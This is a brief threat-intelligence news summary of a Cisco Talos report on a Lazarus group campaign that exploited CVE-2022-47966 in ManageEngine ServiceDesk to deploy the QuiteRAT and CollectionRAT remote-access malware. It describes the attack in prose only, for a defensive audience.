The North Korean state-sponsored Lazarus APT group has initiated a fresh initiative aimed at internet backbone infrastructure and healthcare organizations situated in Europe and the U.S. Cisco Talos reported that the hackers commenced their attack by taking advantage of a vulnerability within ManageEngine ServiceDesk (CVE-2022-47966) as early as January, a mere five days after its disclosure.

Diving into details

• The exploit was employed by Lazarus to establish initial access, prompting the immediate downloading and running of a malicious binary through the Java runtime process, thereby initiating the implant on the compromised server. 
• This binary represents a modified version of the group’s MagicRAT malware, dubbed QuiteRAT.
• The Lazarus Group APT has also introduced a fresh malware named CollectionRAT in this campaign. It functions as a RAT capable of executing arbitrary commands on a compromised system. 

Furthermore, security researchers could establish a connection between CollectionRAT and Jupiter/EarlyRAT, a malicious software previously associated with the Andariel APT faction, which operates under the umbrella of the Lazarus Group.

MagicRAT to QuiteRAT

Similar to MagicRAT, QuiteRAT is constructed using the Qt framework, an open-source, cross-platform framework designed for crafting applications. It boasts functionalities such as arbitrary command execution.

• However, its file size is notably smaller, ranging from 4 to 5MB, in contrast to MagicRAT’s 18MB.
• The analysis points out that this considerable difference in size can be attributed to the Lazarus Group’s decision to incorporate only essential Qt libraries into QuiteRAT, as opposed to MagicRAT, where the entire Qt framework was integrated.
• Although MagicRAT integrates mechanisms for persistence by enabling the configuration of scheduled tasks, QuiteRAT lacks inherent persistence functionality. Instead, QuiteRAT relies on the C2 server to provide it with persistence instructions.

The bottom line

This marks the third officially documented campaign attributed to the Lazarus Group in the early months of 2023, and interestingly, this actor has consistently repurposed the same infrastructure across these operations. Cybersecurity teams are advised to track and analyze the threat for timley prevention of infection from QuiteRAT.